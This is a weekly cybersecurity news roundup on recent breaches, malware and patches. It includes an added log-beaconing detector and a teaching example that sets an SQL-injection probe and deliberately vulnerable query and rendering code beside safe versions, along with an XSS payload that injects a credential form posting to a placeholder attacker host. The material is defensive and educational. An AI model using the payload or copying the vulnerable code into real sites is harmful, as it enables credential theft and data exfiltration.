Last week, breaches and cyberattacks hit several industries: the public sector, IT, automotive, telecommunications, ride-sharing and healthcare. The consequences of earlier breaches and attacks also came to light, such as over 2 million job seekers' personal records stolen after the compromise of 65 legitimate job-listing and retail sites. In other news, Denmark has issued an injunction to stop schools from funnelling student data to Google, and a new password-stealing malware has been found spreading through fake advertisements on Facebook. New vulnerabilities and patches have also been disclosed and released; it is highly recommended not only to be aware of them but to apply the patches as soon as possible. Read on for a quick summary of what happened this week in cybersecurity.

A French healthcare services firm suffered a data breach: data of policyholders and healthcare professionals in France exposed.

French healthcare services firm Viamedis announced on LinkedIn that it was hit by a cyberattack that exposed the data of policyholders and healthcare professionals in France. The exposed data includes beneficiaries' dates of birth, social security numbers, marital status, the name of their health insurer and the guarantees open to third-party payment. Viamedis clarified that the breached systems did not store banking information, postal addresses, telephone numbers or email addresses. The company stated that it will send healthcare professionals separate notifications about the type of data exposed. Viamedis has informed the impacted health organisations, filed a complaint with the public prosecutor and notified the relevant authorities, and says its investigation is still underway to determine the impact and scope of the breach.
Alongside Viamedis, Almerys, another operator that manages third-party payments for supplementary health insurance, was also found to have suffered a data breach. Across both companies, the breaches affect approximately 33 million insured French citizens in total. Almerys stated that the attackers did not breach its central system but did access a portal used by health professionals. The company has filed a complaint with the public prosecutor and an investigation is underway. With 33 million citizens affected, this is one of the largest data breaches in France.

Major data breach in Thailand exposes nearly 20 million elderly Thai citizens' personal information.

The Department of Older Persons (DOP), which sits under Thailand's Ministry of Social Development and Human Security, has been breached, leaking the personally identifiable information (PII) of 19,718,687 elderly Thai citizens. The exposed information includes names, ID card numbers, phone numbers, email addresses, salaries and personal photographs. The breach has already resulted in at least 14 cases of cybercrime, with the origin of the leak still unidentified. After discovering the leak, the DOP immediately lodged a complaint with the Thai cyber police and the Committee for the Protection of Personal Information. The incident is under investigation to determine whether the leak resulted from insider access or external hacking.

HPE investigates claims of a new data breach after data is put up for sale on a hacking forum.

Hewlett Packard Enterprise (HPE) is investigating a new data breach claim after a threat actor put allegedly stolen data up for sale on a hacking forum. The threat actor claims the data contains HPE credentials and other sensitive information.
HPE told BleepingComputer that it has not found any evidence of a breach or any impact to HPE products or services, and that no ransom was requested, but that it is investigating the threat actor's claims. The threat actor, IntelBroker, has shared screenshots of the claimed HPE credentials but has yet to disclose the source of the data or how it was obtained. IntelBroker claims the data includes CI/CD access, system logs, configuration files, access tokens, HPE StoreOnce files (serial numbers, warranty information, etc.), access passwords and email services.

Hyundai Motor Europe suffered a BlackBasta ransomware attack.

Hyundai Motor Europe was hit by a BlackBasta ransomware attack, with the threat actors claiming to have stolen 3TB of corporate data. As told to BleepingComputer, Hyundai Motor Europe is investigating the attack, in which BlackBasta accessed a "limited part of [its] network". The investigation is being carried out with third-party cybersecurity and legal experts, and the company adds that the relevant authorities have been notified. In an image seen by BleepingComputer, BlackBasta shared lists of folders allegedly stolen from numerous Windows domains, including those of KIA Europe. Although the exact type of data stolen is unclear, the folder names suggest it relates to various departments at the company: legal, sales, human resources, accounting, IT and management.

Internal Verizon breach exposed more than 63,000 employees' personal data.

63,206 Verizon employees (about half of the company's workforce) have become victims of a data breach that resulted from a staff member gaining unauthorised access to a file containing personnel records. The majority of those impacted are current Verizon employees, but a small number are former employees.
In a letter sent to affected employees, Verizon stated that it discovered the breach on 12 December, and that on or around 21 September 2023 the staff member obtained the file "without authorisation and in violation of company policy". The compromised personal information includes employees' names, addresses, social security numbers or other national identifiers, gender, union affiliation, dates of birth and compensation information. In the letter, the company further states that it has no evidence the information has been misused or shared outside Verizon, and that it is working to enhance its technical controls to prevent this type of situation from recurring. In its data breach notification filed with the Office of the Maine Attorney General, the breach was described as "inadvertent disclosure, insider wrongdoing". Verizon's internal review found that the breach was not malicious in intent, so the incident was not referred to law enforcement. Verizon has arranged complimentary credit monitoring and identity protection services for those impacted for 24 months.

HopSkipDrive confirmed data breach: more than 155,000 drivers' personal information compromised.

In a filing with Maine's attorney general last week, HopSkipDrive, a student rideshare startup, confirmed that it suffered a cybersecurity incident in June that resulted in a data breach affecting 155,394 drivers' personal information. The stolen data includes names, email addresses, postal addresses, driver's licence numbers and other non-driver identification card numbers. HopSkipDrive spokesperson Campbell Millum said that those affected include people who drive on the platform or who applied to drive on it, and that no employee or customer data was accessed in the breach.
In a letter sent to those affected, HopSkipDrive stated that it became aware of the breach after receiving an email from an unknown threat actor. It then launched an investigation with third-party experts, which determined that the incident occurred between 31 May and 10 June 2023. HopSkipDrive stated that it is committed to strengthening its systems to prevent such incidents from recurring.

Threat group stole over 2 million job seekers' personal information in SQL injection and XSS attacks.

ResumeLooters, a threat group, has stolen 2,079,027 job seekers' personal records after compromising 65 legitimate job-listing and retail sites. The attackers focus mainly on the APAC region, targeting sites in Taiwan, China, India, Thailand, Vietnam and Australia to steal job seekers' names, email addresses, phone numbers, education, employment history and other information. According to Group-IB, which has tracked the group since it emerged, ResumeLooters attempted to sell the stolen data through Telegram channels. ResumeLooters primarily uses SQL injection and cross-site scripting (XSS) to breach targeted sites. After identifying and exploiting weaknesses in a target site, the group injects malicious scripts into the site's HTML; these scripts display phishing forms that harvest visitors' information.

Denmark issues an injunction to stop schools from funnelling student data to Google.

The Danish data protection authority (Datatilsynet) has issued an injunction to stop schools from funnelling student data to Google through the use of Chromebooks and Google Workspace services. The issue was brought to the agency's attention around four years ago by a concerned parent. The agency has now decided that the way students' personal data is transferred to Google lacks a legal basis for all of the disclosed purposes, so 53 municipalities in Denmark must adjust their data processing practices.
The municipalities are ordered to: (1) cease the transfer of personal data to Google or obtain a clear legal basis for such transfers, (2) analyse and document how personal data is processed before using tools such as Google Workspace, and (3) ensure that Google refrains from processing any data it receives for purposes that are not permitted. Non-permissible purposes include maintaining and improving Google Workspace for Education, ChromeOS and the Chrome browser, including measuring performance or developing new features and services for these platforms. The agency's decision is not an outright ban on Chromebooks (which are widely used in Danish schools), but it does impose significant restrictions on how personal data can be shared with Google.

New password-stealing malware spreading via Facebook ads.

A new password-stealing malware called Ov3r_Stealer is being spread through fake job advertisements on Facebook. The malware aims to steal account credentials and cryptocurrency. The fake ads invite targets to apply for an Account Manager position in digital advertising, but lead to a Discord URL, where a PowerShell script downloads the malware payload from a GitHub repository. Trustwave analysts, who discovered the malware, state that the campaign is a severe threat to many potential victims because of how extensively Facebook is used as a social media platform. Ov3r_Stealer attempts to steal data from a broad range of applications, including cryptocurrency wallet apps, web browsers, browser extensions (e.g. Google Authenticator, FreeOTP), Discord, FileZilla and many others. Every 90 minutes the malware collects whatever information it can find on the infected computer and sends it to a Telegram bot, together with the victim's geolocation and a summary of the stolen data.
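Ov3r_Stealer's fixed 90-minute exfiltration cadence is something a defender can look for in egress logs. The following is an added example, not code from this page, from Trustwave or from any vendor: a beacon-interval check over constructed proxy log lines. It groups connections by source host and destination, computes the intervals between consecutive connections, and flags any pair whose interval is nearly constant. It is deliberately not tied to 90 minutes, so it also catches stealers that beacon on a different schedule; the Telegram Bot API path is reported as extra context rather than used as the trigger. The log format, host names and the placeholder bot token are all constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import median

# Constructed sample proxy log (not real telemetry): "timestamp src dest path".
# ws-042 talks to api.telegram.org roughly every 90 minutes; the other lines are noise.
# The token in the /bot... path is a placeholder, not a real Telegram bot token.
SAMPLE_LOG = """\
2024-02-06T08:00:12Z ws-042 api.telegram.org /bot0000000000:PLACEHOLDER/sendDocument
2024-02-06T08:03:10Z ws-042 www.example.com /index.html
2024-02-06T08:05:00Z ws-017 api.telegram.org /bot0000000000:PLACEHOLDER/getMe
2024-02-06T08:07:44Z ws-042 www.example.com /news
2024-02-06T09:30:40Z ws-042 api.telegram.org /bot0000000000:PLACEHOLDER/sendDocument
2024-02-06T10:59:01Z ws-042 www.example.com /news
2024-02-06T11:00:05Z ws-042 api.telegram.org /bot0000000000:PLACEHOLDER/sendDocument
2024-02-06T12:30:50Z ws-042 api.telegram.org /bot0000000000:PLACEHOLDER/sendDocument
2024-02-06T13:12:30Z ws-042 www.example.com /index.html
2024-02-06T14:00:30Z ws-042 api.telegram.org /bot0000000000:PLACEHOLDER/sendDocument
2024-02-06T16:20:00Z ws-017 api.telegram.org /bot0000000000:PLACEHOLDER/getMe
"""

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)$")


def parse_log(text):
    """Parse the constructed log format into (timestamp, src, dest, path) tuples."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip blank or malformed lines rather than failing the whole run
        ts, src, dest, path = m.groups()
        events.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), src, dest, path))
    return events


def find_beacons(text, min_events=4, max_jitter=0.10):
    """Flag (src, dest) pairs that connect at a near-constant interval.

    A pair is reported when it has at least `min_events` connections and the
    largest deviation of any inter-connection gap from the median gap is within
    `max_jitter` (a fraction of the median). Human browsing has large jitter;
    a timer-driven stealer does not.
    """
    by_pair = defaultdict(list)
    for ts, src, dest, path in parse_log(text):
        by_pair[(src, dest)].append((ts, path))

    findings = []
    for (src, dest), hits in by_pair.items():
        if len(hits) < min_events:
            continue
        hits.sort()
        gaps = [(b[0] - a[0]).total_seconds() / 60 for a, b in zip(hits, hits[1:])]
        period = median(gaps)
        if period <= 0:
            continue
        jitter = max(abs(g - period) for g in gaps) / period
        if jitter > max_jitter:
            continue
        findings.append({
            "src": src,
            "dest": dest,
            "events": len(hits),
            "period_minutes": round(period, 1),
            "jitter": round(jitter, 3),
            # Context only: Ov3r_Stealer's reported channel is a Telegram bot.
            "telegram_bot_api": dest == "api.telegram.org"
            and any(p.startswith("/bot") for _, p in hits),
        })
    return findings


if __name__ == "__main__":
    for f in find_beacons(SAMPLE_LOG):
        print(f)
```

On the constructed log this reports a single finding: ws-042 to api.telegram.org, five events, a period of about 90 minutes and sub-1% jitter, with the Telegram Bot API flag set. The two ws-017 connections fall below `min_events`, and the ws-042 browsing to www.example.com is rejected by the jitter test. In production the same logic runs per day over proxy or DNS logs, with `min_events` raised to suit the retention window.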
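Going back to the ResumeLooters item above: the two techniques it names, SQL injection and stored cross-site scripting, are the same mistake in two places, user input being interpreted as code. The following added example, not code from this page or from Group-IB, shows in Python with SQLite a job-board candidate search built by string concatenation beside its parameterised form, and a post-rendering function that interpolates a stored script unescaped beside one that escapes it. The table, records, probe string and phishing payload are constructed for the example; the payload injects a credential form the way the item describes, though it is a toy and is not the group's actual script.

```python
import html
import sqlite3

# Constructed sample data for a toy job board (not real records).
CANDIDATES = [
    ("Alice Tan", "alice@example.com", "+65 0000 0001"),
    ("Bob Lim", "bob@example.com", "+65 0000 0002"),
    ("Chen Wei", "chen@example.com", "+65 0000 0003"),
]


def make_db():
    """In-memory SQLite database standing in for the site's backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE candidates (id INTEGER PRIMARY KEY, name TEXT, email TEXT, phone TEXT)"
    )
    conn.executemany("INSERT INTO candidates (name, email, phone) VALUES (?, ?, ?)", CANDIDATES)
    return conn


def search_candidates_vulnerable(conn, name):
    """Builds the query by concatenation, so `name` is parsed as SQL.

    The probe "' OR '1'='1" turns the WHERE clause into a tautology and dumps
    every row, which is exactly how a job-seeker table gets exfiltrated.
    """
    sql = "SELECT name, email, phone FROM candidates WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def search_candidates_safe(conn, name):
    """Parameterised query: `name` is bound as data and never parsed as SQL."""
    return conn.execute(
        "SELECT name, email, phone FROM candidates WHERE name = ?", (name,)
    ).fetchall()


# Constructed stored-XSS payload: a script that appends a credential form to the page.
# attacker.invalid is a reserved, non-resolving name used as a placeholder.
PHISHING_PAYLOAD = (
    "<script>document.body.insertAdjacentHTML('beforeend',"
    "'<form action=\"https://attacker.invalid/collect\">"
    "<input name=\"email\"><input name=\"password\"></form>')</script>"
)


def render_post_vulnerable(title, body):
    """Interpolates user-supplied HTML unescaped: the script runs in every visitor's browser."""
    return "<h1>" + title + "</h1><div class=\"post\">" + body + "</div>"


def render_post_safe(title, body):
    """Escapes user input so markup is displayed as text rather than executed."""
    return (
        "<h1>" + html.escape(title) + "</h1>"
        "<div class=\"post\">" + html.escape(body) + "</div>"
    )


if __name__ == "__main__":
    conn = make_db()
    probe = "' OR '1'='1"
    print("vulnerable search:", search_candidates_vulnerable(conn, probe))
    print("safe search:      ", search_candidates_safe(conn, probe))
    print(render_post_safe("Account Manager", PHISHING_PAYLOAD))
```

The probe string returns all three candidate rows from the concatenated query and nothing from the parameterised one. For the rendering side, `html.escape` is the minimum; a real site should also set a Content Security Policy so that an injected inline script is blocked even if one escaping call is missed.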
Ivanti warns of a new authentication bypass vulnerability and urges admins to patch Connect Secure immediately.

On 8 February, Ivanti warned of a new authentication bypass vulnerability (tracked as CVE-2024-22024) that affects Connect Secure, Policy Secure and ZTA gateways, and urged admins to secure their appliances immediately. The flaw lets remote attackers gain access to restricted resources on unpatched appliances in low-complexity attacks that require neither user interaction nor authentication. Ivanti stated that it has so far found no evidence of customers being exploited via this vulnerability, but that it is critical for customers to act immediately to ensure they are fully protected.

CISA: new Fortinet RCE bug is being actively exploited.

CISA confirmed on 11 February that attackers are actively exploiting a critical remote code execution (RCE) bug (tracked as CVE-2024-21762) that Fortinet patched last Thursday. The bug lets unauthenticated attackers execute arbitrary code remotely using malicious HTTP requests. Admins are strongly advised to update to the latest version immediately. Where security updates cannot be deployed immediately, the attack vector can be removed by disabling SSL VPN on the device. CISA has ordered US federal agencies to secure FortiOS and FortiProxy devices against this vulnerability within 7 days (by 16 February).

That is all! Enjoy the rest of the week and don't forget to update your devices and systems to the latest patches!
© 2021, TAFA HOLDINGS (S) PTE LTD. ALL RIGHTS RESERVED